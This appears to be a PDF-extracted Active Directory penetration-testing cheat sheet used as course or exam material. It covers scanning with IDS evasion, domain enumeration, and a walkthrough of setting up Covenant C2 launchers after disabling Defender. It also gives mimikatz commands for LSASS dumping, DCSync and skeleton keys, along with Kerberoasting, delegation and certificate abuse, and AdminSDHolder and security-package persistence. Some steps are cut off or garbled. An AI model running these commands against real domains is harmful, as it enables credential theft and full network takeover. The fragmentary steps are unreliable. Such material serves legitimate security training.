Active Directory-1
Active Directory-1
Active Directory-1
PUBLIC
SCHOOL
Active Directory
Reconnaissance
Ping Sweep
nmap -sP 192.168.1.0/24 -oN scan-alive-hosts.txt
nmap -sP 192.168.1.1,5,100,150 -oN scan-alive-hosts.txt
UDP S can:
nmap -sU --top-ports 100 -oN nmap-udp-initial.txt 192.168.1.1
Scan Multiple Targets nmap [target1, target2, etc] Scan a List of Targets
nmap -iL [list.txt]
Scan an Entire Subnet nmap [ip address/cdir] Scan Random Hosts nmap -iR [number]
-Po No ping
C lick ME
Exam Info
Create a Host List
nmap -sL [targets]
Port Specification and Scan Order
Service/Version Detection
Script Scan
OS Detection
C lick ME
Exam Info
Firewall Evasion Techniques
Firewall/IDS Evasion and Spoofing
ragment Packets
nmap -f [target]
Use a Decoy
nmap -D RND:[number] [target]
UDP Scan
nmap -sU [target]
Xmas Scan
nmap -sA [target] TCP ACK Scan nmap -sA [target]
IP Protocol Scan
nmap -sO [target]
C lick ME
Exam Info
Send Raw Ethernet Packets
nmap --send-eth [target]
Send IP Packets
nmap --send-ip [target]
Timing Options Timing Templates nmap -T[0-5] [target]
Set the Packet TTL
nmap --ttl [time] [target]
Minimum NUmber of Parallel Operations
nmap --min-parallelism [number] [target]
Maximum Number of Parallel Operations
nmap --max-parallelism [number] [target]
Minimum Host Group Size
nmap --min-hostgroup [number] [targets]
Maximum Host Group Size
nmap --max-hostgroup [number] [targets]
Maximum RTT Timeout
nmap --initial-rtt-timeout [time] [target]
Initial RTT Timeout
nmap --max-rtt-timeout [TTL] [target]
Maximum Number of Retries
nmap --max-retries [number] [target]
Host Timeout
nmap --host-timeout [time] [target]
Host Timeout
nmap --host-timeout [time] [target]
Minimum Scan Delay
nmap --scan-delay [time] [target]
Maxmimum Scan Delay
nmap --max-scan-delay [time] [target]
Minimum Packet Rate
nmap --min-rate [number] [target]
Maximum Packet Rate
nmap --max-rate [number] [target]
Defeat Reset Rate Limits
nmap --defeat-rst-ratelimit [target]
C lick ME
Exam Info
Shellshock
nmap <ip> -p 80,443 --script=http-shellshock --script-args uri=/cgi-bin/xx.cgi
GitHub - mubix/shellshocker-pocs: Collection of Proof of Concepts and Potential Targets for #ShellShocker
Searchsploit
Find known exploit. Usage:
searchsploit <keyword> To copy the exploit script:
searchsploit <EDB-ID> -m <Output_Location>
https://github.com/outflanknl/Recon-AD
C lick ME
Exam Info
Using BloodHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/Shar pHound.ps1
• # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
• Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
• Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass
<Password> -OutputDirectory <PathToFile>
• # or remotely via BloodHound Python
• # https://github.com/fox-it/BloodHound.py
• pip install bloodhound
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c
all
• Collect more data for certificates exploitation using Certipy
• certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
• certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -
username user@domain -password Password123
Then import the zip/json files into the Neo4J database and query them.
root@payload$ apt install bloodhound
C lick ME
Exam Info
# start BloodHound and the database
root@payload$ neo4j console
# or use docker
root@payload$ docker run -p7474:7474 -p7687:7687 -e
NEO4J_AUTH=neo4j/bloodhound neo4j
root@payload$ ./bloodhound --no-sandbox
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
You can add some custom queries like :
• Bloodhound-Custom-Queries from @hausec
Using PowerView
• #Will show us the policy configurations of the Domain about system access or
kerberos
• (Get-DomainPolicy)."system access"
• (Get-DomainPolicy)."kerberos policy"
• Get Domain Controlers:
• Get-NetDomainController
• Get-NetDomainController -Domain <DomainName>
• Enumerate Domain Users:
• Get-NetUser
• Get-NetUser -SamAccountName <user>
• Get-NetUser | select cn
• Get-UserProperty
C lick ME
Exam Info
• #Enumerate Session Information for a machine
• G et-NetS ession -C omputerName <C omputerName>
• #Returns all GPOs in a domain that modify local group memberships through
Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
• Enumerate Shares
• #Enumerate Domain Shares
• Find-DomainShare
•
•#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
• Enum Group Policies:
• Get-NetGPO
•
• #Shows active Policy on specified machine
• G et-NetG PO -C omputerName <Name of the P C >
• Get-NetGPOGroup
•
• #G et users that are part of a Machine's local Admin group
Find-G P OC omputerAdmin -C omputerName <C omputerName>
• Enum OUs:
• Get-NetOU -FullData
Get-NetGPO -GPOname <The GUID of the GPO>
• Enum ACLs:
• #Returns the ACLs associated with the specified account
• Get-ObjectAcl -SamAccountName <AccountName> -ResolveGUIDs
• Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
C lick ME
Exam Info
Search for interesting ACEs
• Invoke-ACLScanner -ResolveGUIDs
•
•#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
• Enum Domain Trust:
• Get-NetDomainTrust
Get-NetDomainTrust -Domain <DomainName>
• Enum Forest Trust:
• Get-NetForestDomain
• Get-NetForestDomain Forest <ForestName>
•
• #Domains of Forest Enumeration
• Get-NetForestDomain
• Get-NetForestDomain Forest <ForestName>
•
• #Map the Trust of the Forest
• Get-NetForestTrust
Get-NetDomainTrust -Forest <ForestName>
• User Hunting:
• #Finds all machines on the current domain where the current user has local
admin access
• Find-LocalAdminAccess -Verbose
•
• #Find local admins on all machines of the domain:
• Invoke-EnumerateLocalAdmin -Verbose
•
• #Find computers were a Domain Admin OR a specified user has a session
• Invoke-UserHunter
• Invoke-UserHunter -GroupName "RDPUsers"
• Invoke-UserHunter -Stealth
•
• #Confirming admin access:
Invoke-UserHunter –CheckAccess
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
Using AD Module
• Get-ADDomainController
C lick ME
Exam Info
Get-ADDomainController -Identity <DomainName>
• Enumerate Domain Users:
• Get-ADUser -Filter * -Identity <user> -Properties *
•
• #Get a spesific "string" on a user's attribute
Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name,
Description
• Enum Domain Computers:
•Get-ADComputer -Filter * -Properties *
Get-ADGroup -Filter *
• Enum Domain Trust:
• Get-ADTrust -Filter *
Get-ADTrust -Identity <DomainName>
• Enum Forest Trust:
• Get-ADForest
• Get-ADForest -Identity <ForestName>
•
•#Domains of Forest Enumeration
(Get-ADForest).Domains
• Enum Local AppLocker Effective Policy:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Other Interesting Commands
• Find Domain Controllers
• nslookup domain.com
• nslookup -type=srv _ldap._tcp.dc._msdcs.<domain>.com
• nltest /dclist:domain.com
• Get-ADDomainController -filter * | Select-Object name
• gpresult /r
•$Env:LOGONSERVER
echo %LOGONSERVER%
C lick ME
Exam Info
Initial Access
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web- access-
remote- shell
https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office
https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and- digitalocean
https://www.ired.team/offensive-security/code-execution The Hitchhiker’s Guide To Initial Access
How To: Empire’s Cross Platform Office Macro Phishing with PowerPoint
Bash Bunny
USB Drop Attacks: The Danger of “Lost And Found” Thumb Drives
Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 24
Cobalt Strike - Spear Phishing documentation
Cobalt Strike Blog - What's the go-to phishing technique or exploit? Spear phishing with Cobalt Strike -
Raphael Mudge
POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS
C lick ME
Exam Info
Macroless DOC malware that avoids detection with Yara rule Phishing between the app whitelists
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2)
Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2) Social
Engineer Portal
Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012
https://0x1.gitlab.io/pentesting/Red-Teaming-Toolkit/
Covenant C2 Setup
https://captainroot.com/blog/getting-started-with-covenant-c2-in-kali-linux/
https://michaelkoczwara.medium.com/covenant-c2-quick-setup-on-windows-
296a0d400de2
C lick ME
Exam Info
..but I hope to summarise what’s needed to get it up and running on Kali Linux in this post.
First, you need to download the .NET Core framework for Linux. At the time of writing thelatest
version was 3.1. You can find the latest *recommended* release over here:
Official .NET Core downloads for Linux, macOS, and Windows. .NET Core is a cross-
platform
version of .NET, for building…
dotnet.microsoft.com
I have a 64bit Kali linux. I’ve read some recommendations mentioning to use 64bit bit instead of 32bit
Kali when installing Covenant. I downloaded the 64bit version of the .NET SDK packagefrom the .
NET Core 3.1 download page. Screenshot below
Once the tar.gz file is downloaded on to my Kali host, I pretty much followed the instructionsfrom
Here- to extract it and set the relevant environment variables. I’ve detailed the steps I took below
for clarity.
The above command will extract the contents to your $HOME/dotnet folder as confirmedbelow:
C lick ME
Exam Info
Now set the environment variables required with the following commands:export
DOTNET_ROOT=$HOME/dotnet
export PATH=$PATH:$HOME/dotnet
And you are done setting up the .NET Core framework needed for Covenant. Now, lets moveon to
installing Covenant itself.
I installed Covenant under my ~/tools folder, so feel free to change the location as you need:
cd Covenant/Covenant
donet build
Running the above command will start building the Covenant project. It built successfully, youshould
get a message like this:
# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program nametcp 0 0
0.0.0.0:7443 0.0.0.0:* LISTEN 1650543/Covenant
Now, open up a web browser and point to port 7443 of your Kali host. For example, if your Kalihost IP is
192.168.1.10 you should be trying https://192.168.1.10:7443 , as an example.
You will get a certificate warning, which you can safely ignore for now and proceed, which willredirect
you to /covenantuser/login path. If everything has gone well so far, this should take you to the
Covenant initial user registration page as shown below:
C lick ME
Exam Info
Prove a username and password to register an account. Make sure you remember thispassword
or save it securely somewhere.
Once logged in, you will be taken to the /home/index path where the Covenant dashboard willbe
displayed to you as shown below:
https://dian-pentest.medium.com/install-covenant-on-kali-linux-c0350804648d
Covenant Attack – AD
https://www.youtube.com/watch?v=6C8tzKb3kEQ
https://infosecwriteups.com/hack-the-box-sauna-write-up-w-covenant-c2-
c2d71141c90b
C lick ME
Exam Info
Creating Listener
Before we can use the Covenant for red teaming activity, the first thing we need to setup is Listener.
Basically covenant Listener is same as the usual listener we have used like netcat ormeterpreter. In
covenant, stager is called as Grunt. We will talk about it in the next section below. First of all, create
the listener at listener menu.
Name: Identifier name for the listener, default is generated value but you can set it asyou like
ConnectAddress & ConnectPort: Address and port that will be used as connect backfor the stager.
After we create the listener, it will show in listeners list. For example, I create listener withname
First-Listener and type is HTTP.
C lick ME
Exam Info
Listener
Start the listener we’ve created before and it will show you the new information in listener like
the figure below
Start Listener
We can double-check to make sure if listener is successfully active using this command interminal:
C lick ME
Exam Info
Launcher
Launchers are all in one payload delivery feature that generate, host, and download
binaries/script to launch new Grunts
Covenant Launcher
Here is explanation from Covenant wiki:
Binary — The Binary launcher is used to generate custom binaries that launch a Grunt.This is
currently the only launcher that does not rely on a system binary.
MSBuild — The MSBuild launcher is used to generate an MSBuild XML file that
launches a Grunt using msbuild.exe.
InstallUtil — The InstallUtil launcher is used to generate an InstallUtil XML file thatlaunches
a Grunt using installutil.exe.
C lick ME
Exam Info
Mshta — The Mshta launcher is used to generate an HTA file and/or a mshta one-linerthat
launches a Grunt using mshta.exe that relies on DotNetToJScript.
Regsvr32 — The Regsvr32 launcher is used to generate an SCT file and/or regsvr32one-liner
that launches a Grunt using regsvr32.exe that relies on DotNetToJScript.
Wmic — The Wmic launcher is used to generate an xsl file and/or wmic one-liner thatlaunches a
Grunt using wmic.exethat relies on DotNetToJScript.
Cscript — The Cscript launcher is used to generate a JScript file a Gruntusing
cscript.exe that relies on DotNetToJScript.
Wscript — The Wscript launcher is used to generate a JScript file a Gruntusing
wscript.exe that relies on DotNetToJScript.
For this article, I will use Powershell Launcher as the example. Don’t forget to disable windows
defender or bypass the AMSI first(it will be discuss later).
Creating Launcher
Create PowerShellLauncher
C lick ME
Exam Info
Choose and customize with your own environment. I suggest that you choose GruntHTTP forthe
implant template. After that, click generate and it will generate a launcher and encoded launcher
for our need.
C lick ME
Exam Info
Generated launcher
Testing Launcher
We need to test our launcher in our windows box to see how the payload and communicationwork.
Open command prompt and paste the generated launcher.
Powershell launcher
As we can see from above picture, our launcher is successfully connect to listener in grunt. Thisis what
look like in grunts
C lick ME
Exam Info
Grunt information
We can interact with the victim machine using covenant interact feature in grunt
Grunt interaction
Covenant also support GUI file browser
C lick ME
Exam Info
Grunt file browser
I think that’s all for the getting started article about Covenant C2. Will talk about the more
covenant feature in the next article.
If you like this article, please share it and feedback are always welcome.
Reference:
https://posts.specterops.io/entering-a-covenant-net-command-and-control-
e11038bcf462
https://petruknisme.medium.com/getting-started-with-covenant-c2-for-red-
teaming- 8eeb94273b52 https://github.com/active-
labs/ACTIVEBlog/blob/master/Red%20Team%20Infrastructure%20-
%20C2/Red%20Team%20Infrastructure%20-%20C2.md
Local Privilege Escalation
Windows Privilege Escalation CheatSheet Cheat Sheet for Windows Local PrivilegeEscalations
Juicy Potato Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System
Impersonation
Works only until Windows Server 2016 and Windows 10 until patch 1803
i Works only until Windows Server 2016 and Windows 10 until patch 1803
C lick ME
Exam Info
Lateral Movement
PowerShell Remoting
#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting
C lick ME
Exam Info
#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords
mimikatz sekurlsa::tspkg
mimikatz sekurlsa::ekeys
C lick ME
Exam Info
#Dump SECRETS Database
mimikatz lsadump::secrets
mimikatz privilege::debug
mimikatz token::elevate mimikatz
lsadump::lsa /inject
#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all
C lick ME
Exam Info
❗ What if mimikatz fails to dump credentials because of LSA Protection controls ?
#Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is setto 0x1
#Next upload the mimidriver.sys from the official mimikatz repo to same folder of your
mimikatz.exe
mimikatz # !+
#Finally run the logonpasswords function to dump lsassmimikatz
# sekurlsa::logonpasswords
o PPLdump
#If it does there isn't a way tou dump lsass, we will only get encrypted data. But wecan still
use keyloggers or clipboard dumpers to capture data.
#Lets inject our own malicious Security Support Provider into memory, for thisexample
i'll use the one mimikatz provides
mimikatz # misc::memssp
#Now every user session and authentication into this machine will get logged and plaintext
credentials will get captured and dumped into c:\windows\system32\mimilsa.log
C lick ME
Exam Info
POWERSHELL REMOTING
exit
# PUSH LOCAL SCRIPT TO SESSION
C lick ME
Exam Info
Invoke-Command -FilePath .\Invoke-Mimikatz.ps1 -Session $sessEnter-
PSSession $sess
# DUMPING
Invoke-Mimikatz -Command '"lsadump::lsa /patch“’
FORWARDER
# RULE
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080
connectaddress=10.10.10.10 connectport=8080
# CHECK
A command you run on ServerB via your PowerShell Remoting session attempts toaccess a
resource on ServerC.
◆ Access to the resource on ServerC is denied, because the credentials you used to create the
PowerShell Remoting session are not passed from ServerB to ServerC.
◆—Cannot encapsulate multiple psremoting session.
◆
— Delegation not available.
# PSREMOTE TO SERVER A
C lick ME
Exam Info
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\alice',
$SecPassword)
# CHECK INJECTION:
# RCE ON SERVER C:
C lick ME
Exam Info
Domain Privilege Escalation 1
Kerberoast
WUT IS DIS?:
All standard domain users can request a copy of all service accounts along with their
correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user"
account, extract the encrypted blob that was encrypted using the user's password and
bruteforce it offline.
PowerView:
NetUser -SPN
#Get every available SPN account, request a TGS and dump its hashInvoke-
Kerberoast
Request-SPNTicket
AD Module:
Impacket:
python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile
<FileName>
Rubeus:
#Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabledaccounts
C lick ME
Exam Info
#Kerberoast by specifying the authentication credentials
Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because
Machine Account hashes are not crackable!
PowerView:
Invoke-ASREPRoast -Verbose
Using Rubeus:
C lick ME
Exam Info
Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName>
/outfile:<filename>
Using Impacket:
Tools:
DomainPasswordSpray
CrackMapExec
Invoke-CleverSpray
Spray
PowerView:
AD Module:
C lick ME
Exam Info
#Force set the SPN on the account:
If you have local administrator access on a machine try to list shadow copies, it's an easy wayfor
Domain Escalation.
1. You can dump the backuped SAM database and harvest credentials.
2. Look for DPAPI stored creds and decrypt them.
3. Access backuped sensitive files.
%appdata%\Microsoft\Credentials
%localappdata%\Microsoft\Credentials
#By using the cred function of mimikatz we can enumerate the cred object and get informationabout
it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>“
#From the previous command we are interested to the "guidMasterKey" parameter, that tellsus
which masterkey was used to encrypt the credential
C lick ME
Exam Info
#Now if we are on the context of the user (or system) that the credential belogs to, we can usethe /rpc
flag to pass the decryption of the masterkey to the domain controler:
WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation
enabled, we can wait for a high value target or DA to connect to it, steal his TGTthen ptt and
impersonate him!
Using PowerView:
NetComputer -UnConstrained
#List tickets and check if a DA or some High Value target has stored its TGT
C lick ME
Exam Info
Constrained Delegation
Using PowerView and Kekeo:
DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user usingkekeo
#Then using the TGT we have ask a TGS for a Service this user has Access to through
constrained delegation
)►† What if we have delegation rights for only a spesific SPN? (e.g TIME):
In this case we can still abuse a feature of kerberos called "alternative service". This allows usto
request TGS tickets for other "alternative" services and not only for the one we have rights
for. Thats gives us the leverage to request valid tickets for any service we want that the host
supports, giving us full access over the target machine.
C lick ME
Exam Info
Tools we are going to use:
PowerView
Powermad
Rubeus
First we need to enter the security context of the user/machine account that has the privilegesover
the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-
SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select
-Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine accountusing a
raw security descriptor:
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'
#And for this example, we are going to impersonate Domain Administrator on the cifs serviceof the
target computer using Rubeus
C lick ME
Exam Info
WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup
Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current
state of the DC, extract the ntds.dit database file, dump the hashes and escalate ourprivileges to
DA.
1. Once we have access on an account that has the SeBackupPrivilege we can access theDC and
create a shadow copy using the signed binary diskshadow:
2. #Create a .txt file that will contain the shadow copy process script
3. Script ->{
4. set context persistent nowriters
5. set metadata c:\windows\system32\spool\drivers\color\example.cab
6. set verbose on
7. begin backup
14. }
15.
C lick ME
Exam Info
16. #Execute diskshadow with our script as parameter
diskshadow /s script.txt
17. Next we need to access the shadow copy, we may have the SeBackupPrivilege but wecant just
simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy
it on an accessible folder. For this we are going to
20. Get-SeBackupPrivilege23.
25. Set-SeBackupPrivilege26.
27. #Use the functionality of the dlls to copy the ntds.dit database file from the shadowcopy to a
location of our choice
29. 29.
Abusing Exchange
CVE-2020-0688
PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange
NetNTLMtoSilverTicket
C lick ME
Exam Info
Abusing ACLs
aclpwn.py
Invoke-ACLPwn
mitm6
Exploitation example:
Format: RootDomainSID-519
C lick ME
Exam Info
#List the DC of the Root Domaindir
\\dc.root.domain.local\C$
Zerologon
PrintNightmare
Note: Certify can be executed with Cobalt Strike's execute-assembly command as well
.\Certify.exe find /vulnerable /quiet
Make sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that
the Enrollment Rights allow Domain/Authenticated Users. Additionally, check that the
pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the
"Authorized Signatures Required" parameter is set to 0.
C lick ME
Exam Info
This exploit only works because these settings enable server/client authentication, meaning an
attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with Rubeus
to forge authentication.
Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended.Check
before choosing a DA to target.
Example of cert.pem:
BIIEogIBAAk15x0ID[. ]
[...]
[...]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
BIIEogIBOmgAwIbSe[ ]
[...]
[...]
-----END CERTIFICATE-----
#Utilize openssl to Convert to PKCS #12 Format
The openssl command can be utilized to convert the certificate file into PKCS #12 format (youmay be
required to enter an export password, which can be anything you like).
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export
-out cert.pfx
Once the cert.pfx file has been exported, upload it to the compromised host (this can be donein a
variety of ways, such as with Powershell, SMB, certutil.exe, Cobalt Strike's upload functionality, etc.)
C lick ME
Exam Info
After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to
request a Kerberos TGT for the DA account which will then be imported into memory.
This should result in a successfully imported ticket, which then enables an attacker to performvarious
malicious acitivities under DA user context, such as performing a DCSync attack.
No PAC
sAMAccountname Spoofing Exploitation of CVE-2021-42278 and CVE-2021-42287
Domain Persistence 1
C lick ME
Exam Info
#DCsync using secretsdump.py from impacket with Kerberos Authentication secretsdump.py
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
C lick ME
Exam Info
#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name
"DsrmAdminLogonBehaviour" -Value 2 -Verbose
From powershell:
#Get current Security Package:
$packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name
'Security Packages' | select -ExpandProperty 'Security Packages'
#Append mimilib:
$packages += "mimilib"
#ALTERNATIVE:
Invoke-Mimikatz -Command '"misc::memssp"'
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
DCSync feature for getting krbtgt hash
ACCOUNT DUMPING
C lick ME
Exam Info
GOLDEN TICKET
■ On any machine
C lick ME
Exam Info
Invoke-Mimikatz - Resum
Command e
SILVER TICKET
C lick ME
Exam Info
Create a silver ticket for the HOST SPN which will allow us to schedule a task
C lick ME
Exam Info
SKELETON KEY
# REMOTE
# LOGIN
PASSWORD mimikatz
mimikatz # misc::skeleton
mimikatz # !-
DSRM
Dump DSRM password (needs DA privs)
C lick ME
Exam Info
/ntlm:00000000000000000000000000000000 /run:powershell.exe"
Dump local acconut
$packages = Get-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -
ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value
$packages
CHECK C:\Windows\system32\kiwissp.log
C lick ME
Exam Info
ADMINSDHOLDER
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected
groups and members with the ACL of AdminSDHolder and any differencesare overwritten on the
object ACL
Protected Groups
Replicator
Groups Resume
Account
Operators
Cannot modify DA/EA/BA groups. Can modify nested group within
Server Operators Run a command as system (using the disabled Browser service)
C lick ME
Exam Info
Add FullControl permissions for a user to the AdminSDHolder using PowerView as DA
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName
attacker -Rights All -Verbose
ADACL -DistinguishedName
#
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName
attacker -Rights WriteMembers -Verbose
Import-Module Invoke-SDPropagator.ps1
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
C lick ME
Exam Info
# ADD OBJECT ACL
# DCSYNC
Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs |
?{($_.IdentityReference -match "targetuser") -and (($_.ObjectType -match 'replication') -or
($_.ActiveDirectoryRights -match 'GenericAll'))}
Rights Abuse
Add FullControl rights
Add-ObjectAcl -TargetDistinguishedName 'DC=lab,DC=domain,DC=local' -
PrincipalSamAccountName john -Rights All -Verbose
Execute DCSync
WMI
Verbose
C lick ME
Exam Info
Set-RemoteWMI -UserName jane -ComputerName DC01 -Credential Administrator -
namespace 'root\cimv2' -Verbose
PSREMOTE
REMOTE REGISTRY
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat- Sheet/tree/master/H%20-
%20Persistence
C lick ME
Exam Info
Payload .NET
Additional Reading
https://www.nccgroup.trust/uk/about-us/newsroom-and-
events/blogs/2019/march/finding-and-exploiting-.net-remoting-over-http-using-
deserialisation/
https://www.nccgroup.trust/uk/about-us/newsroom-and- events/blogs/2018/august/aspnet-
resource-files-resx-and-deserialisation-issues/
https://www.nccgroup.trust/uk/our-research/use-of-deserialisation-in-.net-
framework-methods-and-classes/?research=Whitepapers
https://community.microfocus.com/t5/Security-Research-Blog/New-NET-
deserialization-gadget-for-compact-payload-When-size/ba-p/1763282
https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net- via-
viewstate/
https://www.nccgroup.trust/uk/about-us/newsroom-and-
events/blogs/2019/august/getting-shell-with-xamlx-files/
https://soroush.secproject.com/blog/2019/08/uploading-web-config-for-fun-and- profit-
2/
C lick ME
Exam Info
Usage:
https://cert.360.cn/warning/detail?id=e689288863456481733e01b093c986b6
https://labs.mwrinfosecurity.com/advisories/milestone-xprotect-net-deserialization-
vulnerability/
https://soroush.secproject.com/blog/2018/12/story-of-two-published-rces-in- sharepoint-
workflows/
https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting- an-
elevation-of-privilege-in-docker-for-windows.html
https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-014/-cyberark- password-
vault-web-access-remote-code-execution
https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf
https://www.zerodayinitiative.com/blog/2019/3/13/cve-2019-0604-details-of-a- microsoft-
sharepoint-rce-vulnerability
https://www.zerodayinitiative.com/blog/2018/8/14/voicemail-vandalism-getting- remote-
code-execution-on-microsoft-exchange-server
https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-
vulnerabilities-in-smartermail/
https://www.nccgroup.trust/uk/our-research/technical-advisory-code-execution-by- viewing-
resource-files-in-net-reflector/
https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting- services-
ssrs/
https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on- microsoft-
exchange-server-through-fixed-cryptographic-keys
Talks:
https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json- Attacks.pdf
https://speakerdeck.com/pwntester/attacking-net-serialization
https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending- vulnerable-
endpoints
https://gosecure.github.io/presentations/2018-03-18-
confoo_mtl/Security_boot_camp_for_.NET_developers_Confoo_v2.pdf
https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf
https://nullcon.net/website/archives/pdf/goa-2018/rohit-slides.pdf
C lick ME
Exam Info
Tools:
https://github.com/pwntester/ViewStatePayloadGenerator
https://github.com/0xACB/viewgen
https://github.com/Illuminopi/RCEvil.NET
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Cheat Sheet
Privilege Escalation
PASSWORDS IN SYSVOL & GROUP POLICY PREFERENCES
Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
DNSADMINS
UNCONSTRAINED DELEGATION
Domain Controller Print Server + Unconstrained Kerberos Delegation = Pwned ActiveDirectory
Forest
Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How
Compromise of a Single Server Can Compromise the Domain)
C lick ME
Exam Info
Hunting in Active Directory: Unconstrained Delegation & Forests Trusts
CONSTRAINED DELEGATION
S4U2Pwnage
DOMAIN TRUSTS
A Guide to Attacking Domain Trusts
It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across ActiveDirectory
Trusts
Active Directory forest trusts part 1 - How does SID filtering work?
The Forest Is Under Control. Taking over the entire Active Directory forest
The Trustpocalypse
DCSHADOW
DCShadow
DCShadow explained: A technical deep dive into the latest AD attack technique
DCShadow - Silently turn off Active Directory Auditing
C lick ME
Exam Info
DCShadow - Minimal permissions, Active Directory Deception, Shadowception andmore
RID
• Rid Hijacking: When Guests Become Admins
Lateral Movement
MICROSOFT SQL SERVER DATABASE LINKS
• SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server!
• WSUSpendu
PASSWORD SPRAYING
• Password Spraying Windows Active Directory Accounts - Tradecraft Security Weekly #5
C lick ME
Exam Info
• ANGRYPUPPY - Bloodhound Attack Path Automation in CobaltStrike
Defense Evasion
IN-MEMORY EVASION
OPSEC
• Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
C lick ME
Exam Info
SYSMON EVASION
